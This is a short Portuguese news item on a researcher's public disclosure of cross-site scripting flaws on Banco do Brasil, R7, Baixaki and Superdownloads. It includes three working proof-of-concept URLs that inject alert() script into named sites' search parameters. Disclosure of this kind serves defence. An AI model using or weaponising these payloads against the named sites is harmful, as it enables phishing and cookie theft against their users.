Especialista descobre falhas de segurança nos sites do Banco do Brasil, R7, Baixaki e Superdownloads

Foram divulgadas hoje falhas de segurança nos sites da R7 da Emissora Record, nos sites de divulgação de programas Baixaki e Superdownloads, e inclusive no site do Banco do Brasil, a maior instituição financeira do Brasil, descobertas pelo especialista em segurança Mario G. de Souza, autor do blog http://netfuzzer.blogspot.com/ .

Tratam-se de falhas de Cross-Site Scripting (XSS), as quais consistem numa vulnerabilidade em que são introduzidos comandos Javascript em páginas legítimas.

Esses comandos podem redirecionar usuários leigos a sites de phishing (páginas que possuem intuito de estelionato) ou inclusive podem furtar dados pessoais contidos em cookies da página vulnerável.

O especialista relata que notificou todos os administradores de sistema, sem qualquer resposta, alguns há mais de um ano.

Seguem abaixo algumas demonstrações desta falha:

Baixaki -
http://www.baixaki.com.br/busca.asp?z=1&cx=partner-pub-7019091094896260:86zzz47inzp&cof=FORID:9&sa=Pesquisar&q=m3u%22;%20%0D%0A%20//id=%22q%22%20%0D%0A%20%20alert(String.fromCharCode(88,83,83));;//

Superdownloads -
http://busca.superdownloads.com.br/busca.cfm?q=aaaaaaaa%27%7D%3B+alert%28%27XSS%27%29%3B+var+code+%3D+%7B%27xss%27%3A%27xss&a=Softwares

R7.com - http://busca.r7.com/s?_te=&q=xss%27};%20alert%28%27XSS%27%29;%20var%20code%20=%20{%27xss%27:%27xss